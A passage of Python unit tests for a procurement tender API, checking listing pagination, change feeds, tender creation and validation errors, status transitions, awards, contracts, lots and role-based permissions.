self.assertIn('opt_fields=status', response.json['next_page']['uri'])
response = self.app.get('/tenders?descending=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
self.assertEqual([i['dateModified'] for i in response.json['data']],
sorted([i['dateModified'] for i in tenders], reverse=True))
response = self.app.get('/tenders?descending=1&limit=2')
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 2)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 1)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 0)
test_tender_data2 = self.initial_data.copy()
test_tender_data2['mode'] = 'test'
response = self.app.post_json('/tenders', {'data': test_tender_data2})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
while True:
response = self.app.get('/tenders?mode=test')
self.assertEqual(response.status, '200 OK')
if len(response.json['data']) == 1:
break
self.assertEqual(len(response.json['data']), 1)
response = self.app.get('/tenders?mode=_all_')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 4)
def tender_award_create(self):
data = self.initial_data.copy()
award_id = "1234" * 8
data['awards'] = [{'suppliers': [test_organization],
'subcontractingDetails': 'Details',
'status': 'pending',
'qualified': True,
'id': award_id}
]
data['contracts'] = [{'title': 'contract title', 'description': 'contract description', 'awardID': award_id}]
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertNotIn('contracts', response.json['data'])
self.assertNotIn('awards', response.json['data'])
def listing_changes(self):
response = self.app.get('/tenders?feed=changes')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
tenders = []
for i in range(3):
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tenders.append(response.json['data'])
ids = ','.join([i['id'] for i in tenders])
while True:
response = self.app.get('/tenders?feed=changes')
self.assertTrue(ids.startswith(','.join([i['id'] for i in response.json['data']])))
if len(response.json['data']) == 3:
break
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
self.assertEqual(set([i['dateModified'] for i in response.json['data']]),
set([i['dateModified'] for i in tenders]))
self.assertEqual([i['dateModified'] for i in response.json['data']],
sorted([i['dateModified'] for i in tenders]))
response = self.app.get('/tenders?feed=changes&limit=2')
self.assertEqual(response.status, '200 OK')
self.assertNotIn('prev_page', response.json)
self.assertEqual(len(response.json['data']), 2)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 1)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 0)
response = self.app.get('/tenders?feed=changes', params=[('opt_fields', 'status')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
self.assertIn('opt_fields=status', response.json['next_page']['uri'])
response = self.app.get('/tenders?feed=changes', params=[('opt_fields', 'status,enquiryPeriod')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified', u'status']))
self.assertIn('opt_fields=status', response.json['next_page']['uri'])
response = self.app.get('/tenders?feed=changes&descending=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(len(response.json['data']), 3)
self.assertEqual(set(response.json['data'][0]), set([u'id', u'dateModified']))
self.assertEqual(set([i['id'] for i in response.json['data']]), set([i['id'] for i in tenders]))
self.assertEqual([i['dateModified'] for i in response.json['data']],
sorted([i['dateModified'] for i in tenders], reverse=True))
response = self.app.get('/tenders?feed=changes&descending=1&limit=2')
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 2)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 1)
response = self.app.get(response.json['next_page']['path'].replace(ROUTE_PREFIX, ''))
self.assertEqual(response.status, '200 OK')
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertEqual(len(response.json['data']), 0)
test_tender_data2 = self.initial_data.copy()
test_tender_data2['mode'] = 'test'
response = self.app.post_json('/tenders', {'data': test_tender_data2})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
while True:
response = self.app.get('/tenders?feed=changes&mode=test')
self.assertEqual(response.status, '200 OK')
if len(response.json['data']) == 1:
break
self.assertEqual(len(response.json['data']), 1)
response = self.app.get('/tenders?feed=changes&mode=_all_')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 4)
def create_tender_invalid(self):
request_path = '/tenders'
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description':
u"Content-Type header should be one of ['application/json']", u'location': u'header',
u'name': u'Content-Type'}
])
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'No JSON object could be decoded',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, 'data', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'not_data': {}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': []}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType':'reporting',
'invalid_field': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Rogue field', u'location':
u'body', u'name': u'invalid_field'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'reporting',
'value': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [
u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body',
u'name': u'value'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'reporting',
'procurementMethod': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertIn(
{u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body',
u'name': u'procurementMethod'}, response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'},
response.json['errors'])
data = self.initial_data["items"][0].pop("additionalClassifications")
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
status = 422 if get_now() < NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM else 201
response = self.app.post_json(request_path, {'data': self.initial_data}, status=status)
self.initial_data["items"][0]["additionalClassifications"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
if status == 201:
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
else:
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [u'This field is required.']}], u'location': u'body',
u'name': u'items'}
])
data = self.initial_data["items"][0]["additionalClassifications"][0]["scheme"]
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = 'Не ДКПП'
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
if get_now() > CPV_ITEMS_CLASS_FROM:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДК003, ДК015, ДК018, specialNorms]."]}],
u'location': u'body', u'name': u'items'}
])
else:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДКПП, NONE, ДК003, ДК015, ДК018]."]}],
u'location': u'body', u'name': u'items'}
])
addit_classif = [
{"scheme": "INN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"},
{"scheme": "INN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"}
]
data = self.initial_data["items"][0]["classification"]['id']
self.initial_data["items"][0]['classification']['id'] = u"33600000-6"
orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
self.initial_data["items"][0]["additionalClassifications"] = addit_classif
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
self.initial_data["items"][0]["classification"]['id'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{u"location": u"body", u"name": u"items", u"description": [
u"Item with classification.id=33600000-6 have to contain "
u"exactly one additionalClassifications with scheme=INN"]}])
addit_classif = [
{"scheme": "INN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"},
{"scheme": "INN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"}
]
data = self.initial_data["items"][0]["classification"]['id']
self.initial_data["items"][0]['classification']['id'] = u"33611000-6"
orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
self.initial_data["items"][0]["additionalClassifications"] = addit_classif
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
self.initial_data["items"][0]["classification"]['id'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{u"location": u"body", u"name": u"items", u"description": [
u"Item wich classification.id starts with 336 and contains "
u"additionalClassification objects have to contain no more than "
u"one additionalClassifications with scheme=INN"]}])
addit_classif = [
{"scheme": "INN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"}
]
data = self.initial_data["items"][0]["classification"]['id']
self.initial_data["items"][0]['classification']['id'] = u"33611000-6"
orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
self.initial_data["items"][0]["additionalClassifications"] = addit_classif
response = self.app.post_json(request_path, {'data': self.initial_data})
self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
self.initial_data["items"][0]["classification"]['id'] = data
self.assertEqual(response.status, '201 Created')
addit_classif = [
{"scheme": "NotINN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"},
{"scheme": "NotINN",
"id": "17.21.1",
"description": "папір і картон гофровані, паперова й картонна тара"}
]
data = self.initial_data["items"][0]["classification"]['id']
self.initial_data["items"][0]['classification']['id'] = u'33652000-5'
orig_addit_classif = self.initial_data["items"][0]["additionalClassifications"]
self.initial_data["items"][0]["additionalClassifications"] = addit_classif
response = self.app.post_json(request_path, {'data': self.initial_data})
self.initial_data["items"][0]["additionalClassifications"] = orig_addit_classif
self.initial_data["items"][0]["classification"]['id'] = data
self.assertEqual(response.status, '201 Created')
data = self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
del self.initial_data["procuringEntity"]["contactPoint"]["telephone"]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["procuringEntity"]["contactPoint"]["telephone"] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}},
u'location': u'body', u'name': u'procuringEntity'}
])
data = self.initial_data["items"][0].copy()
classification = data['classification'].copy()
classification["id"] = u'19212310-1'
data['classification'] = classification
self.initial_data["items"] = [self.initial_data["items"][0], data]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"] = self.initial_data["items"][:1]
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'CPV group of items be identical'], u'location': u'body', u'name': u'items'}
])
data = deepcopy(self.initial_data)
del data["items"][0]['deliveryDate']
response = self.app.post_json(request_path, {'data': data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'deliveryDate': [u'This field is required.']}], u'location': u'body', u'name': u'items'}
])
def field_relatedLot(self):
request_path = '/tenders'
data = deepcopy(self.initial_data)
data['items'][0]['relatedLot'] = uuid4().hex
response = self.app.post_json(request_path, {'data': data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'relatedLot': [u'This option is not available']}], u'location': u'body',
u'name': u'items'}])
def create_tender_generated(self):
data = self.initial_data.copy()
data.update({'id': 'hash', 'doc_id': 'hash2', 'tenderID': 'hash3'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
fields = [u'id', u'dateModified', u'tenderID', u'status', u'items',
u'value', u'procuringEntity', u'owner', u'procurementMethod',
u'procurementMethodType', u'title', u'date']
if u'procurementMethodDetails' in self.initial_data:
fields.append(u'procurementMethodDetails')
if "negotiation" == self.initial_data['procurementMethodType']:
fields.append(u'cause')
if "negotiation" in self.initial_data['procurementMethodType']:
fields.append(u'causeDescription')
self.assertEqual(set(tender), set(fields))
self.assertNotEqual(data['id'], tender['id'])
self.assertNotEqual(data['doc_id'], tender['id'])
self.assertNotEqual(data['tenderID'], tender['tenderID'])
def create_tender_draft(self):
data = self.initial_data.copy()
data.update({'status': 'draft'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
owner_token = response.json['access']['token']
self.assertEqual(tender['status'], 'draft')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'value': {'amount': 100}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u"Can't update tender in current (draft) status", u'location': u'body', u'name': u'data'}
])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
self.assertEqual(tender['status'], 'active')
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
self.assertEqual(tender['status'], 'active')
def create_tender(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_set = set(tender)
if 'procurementMethodDetails' in tender_set:
tender_set.remove('procurementMethodDetails')
if "negotiation" == self.initial_data['procurementMethodType']:
tender_set.remove(u'cause')
if "negotiation" in self.initial_data['procurementMethodType']:
tender_set.remove(u'causeDescription')
self.assertEqual(tender_set - set(self.initial_data), set(
[u'id', u'date', u'dateModified', u'owner', u'tenderID', u'status', u'procurementMethod']))
self.assertIn(tender['id'], response.headers['Location'])
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(set(response.json['data']), set(tender))
self.assertEqual(response.json['data'], tender)
response = self.app.post_json('/tenders?opt_jsonp=callback', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/javascript')
self.assertIn('callback({"', response.body)
response = self.app.post_json('/tenders?opt_pretty=1', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
response = self.app.post_json('/tenders', {"data": self.initial_data, "options": {"pretty": True}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
data = deepcopy(self.initial_data)
del data["items"][0]['deliveryAddress']['postalCode']
del data["items"][0]['deliveryAddress']['locality']
del data["items"][0]['deliveryAddress']['streetAddress']
del data["items"][0]['deliveryAddress']['region']
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertNotIn('postalCode', response.json['data']['items'][0]['deliveryAddress'])
self.assertNotIn('locality', response.json['data']['items'][0]['deliveryAddress'])
self.assertNotIn('streetAddress', response.json['data']['items'][0]['deliveryAddress'])
self.assertNotIn('region', response.json['data']['items'][0]['deliveryAddress'])
initial_data = deepcopy(self.initial_data)
initial_data['items'][0]['classification']['id'] = "99999999-9"
additional_classification =\
initial_data['items'][0].pop('additionalClassifications')
additional_classification[0]['scheme'] = "specialNorms"
if get_now() > NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM:
response = self.app.post_json('/tenders', {"data": initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
self.assertEqual(tender['items'][0]['classification']['id'],
'99999999-9')
self.assertNotIn('additionalClassifications', tender['items'][0])
initial_data['items'][0]['additionalClassifications'] =\
additional_classification
response = self.app.post_json('/tenders', {"data": initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
self.assertEqual(tender['items'][0]['classification']['id'], '99999999-9')
self.assertEqual(
tender['items'][0]['additionalClassifications'],
additional_classification
)
def patch_tender(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
dateModified = tender.pop('dateModified')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'procurementMethodRationale': 'Limited'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
new_tender = response.json['data']
new_dateModified = new_tender.pop('dateModified')
tender['procurementMethodRationale'] = 'Limited'
self.assertEqual(tender, new_tender)
self.assertNotEqual(dateModified, new_dateModified)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'dateModified': new_dateModified}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
new_tender2 = response.json['data']
new_dateModified2 = new_tender2.pop('dateModified')
self.assertEqual(new_tender, new_tender2)
self.assertEqual(new_dateModified, new_dateModified2)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'procuringEntity': {'kind': 'defense'}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']['procuringEntity']['kind'], 'defense')
revisions = self.db.get(tender['id']).get('revisions')
self.assertEqual(revisions[-1][u'changes'][0]['op'], u'remove')
self.assertEqual(revisions[-1][u'changes'][0]['path'], u'/procurementMethodRationale')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [self.initial_data['items'][0]]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}, self.initial_data['items'][0]]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
item0 = response.json['data']['items'][0]
item1 = response.json['data']['items'][1]
self.assertNotEqual(item0.pop('id'), item1.pop('id'))
self.assertEqual(item0, item1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(len(response.json['data']['items']), 1)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"classification": {
"scheme": "ДК021",
"id": "55523100-3",
"description": "Послуги з харчування у школах"
}}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'items': [{"additionalClassifications": [
tender['items'][0]["additionalClassifications"][0] for i in range(3)
]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {
'data': {'items': [{"additionalClassifications": tender['items'][0]["additionalClassifications"]}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
# The following operations are performed for a proper transition to the "Complete" tender status
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(
tender['id'], owner_token), {'data': {'suppliers': [test_organization], 'status': 'pending'}})
award_id = response.json['data']['id']
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender['id'], award_id, owner_token),
{"data": {"qualified": True, "status": "active"}})
response = self.app.get('/tenders/{}/contracts'.format(
tender['id']))
contract_id = response.json['data'][0]['id']
response = self.app.post('/tenders/{}/contracts/{}/documents?acc_token={}'.format(
tender['id'], contract_id, owner_token), upload_files=[('file', 'name.doc', 'content')])
self.assertEqual(response.status, '201 Created')
save_tender = self.db.get(tender['id'])
for i in save_tender.get('awards', []):
if i.get('complaintPeriod', {}): # works for negotiation tender
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(save_tender)
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
tender['id'], contract_id, owner_token), {'data': {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'complete')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'active'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update tender in current (complete) status")
def tender_Administrator_change(self):
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
authorization = self.app.authorization
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/tenders/{}'.format(tender['id']),
{'data': {'mode': u'test',
'procuringEntity': {"identifier": {"id": "00000000"}}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['mode'], u'test')
self.assertEqual(response.json['data']["procuringEntity"]["identifier"]["id"], "00000000")
self.app.authorization = authorization
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('administrator', ''))
response = self.app.patch_json('/tenders/{}'.format(tender['id']), {'data': {'mode': u'test'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['mode'], u'test')
# TenderNegotiationResourceTest
def field_relatedLot_negotiation(self):
request_path = '/tenders'
data = deepcopy(self.initial_data)
data['items'][0]['relatedLot'] = uuid4().hex
response = self.app.post_json(request_path, {'data':data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'relatedLot': [u'relatedLot should be one of lots']}], u'location': u'body', u'name': u'items'}])
def changing_tender_after_award(self):
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create lot
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
{'data': self.test_lots_data[0]})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
first_lot = response.json['data']
# create second lot
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
{'data': self.test_lots_data[0]})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
# change tender
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{'data': {'description': 'New description'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['description'], 'New description')
# first award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization], 'status': 'pending',
'lotID': first_lot['id'], 'qualified': True}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
# change tender
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{'data': {'description': 'New description'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can't update tender when there is at least one award.")
def initial_lot_date(self):
# create tender were initial data has lots
lots = deepcopy(self.test_lots_data)*2
data = deepcopy(self.initial_data)
data['lots'] = lots
response = self.app.post_json('/tenders',
{"data": data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# check if initial lots have date
response = self.app.get('/tenders/{}'.format(tender_id))
lots = response.json['data']['lots']
self.assertIn('date', lots[0])
self.assertIn('date', lots[1])
# create lot
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token),
{'data': self.test_lots_data[0]})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
# check all lots has a initial date
response = self.app.get('/tenders/{}'.format(tender_id))
lots = response.json['data']['lots']
self.assertIn('date', lots[0])
self.assertIn('date', lots[1])
self.assertIn('date', lots[2])
# TenderProcessTest
def tender_status_change(self):
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {'data': {'status': 'complete'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'][0]["description"], "Chronograph has no power over me!")
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.patch_json('/tenders/{}'.format(tender_id), {'data': {'status': 'complete'}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
# check status
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'active')
# try to mark tender complete
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), {'data': {'status': 'complete'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
def single_award_tender(self):
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# get awards
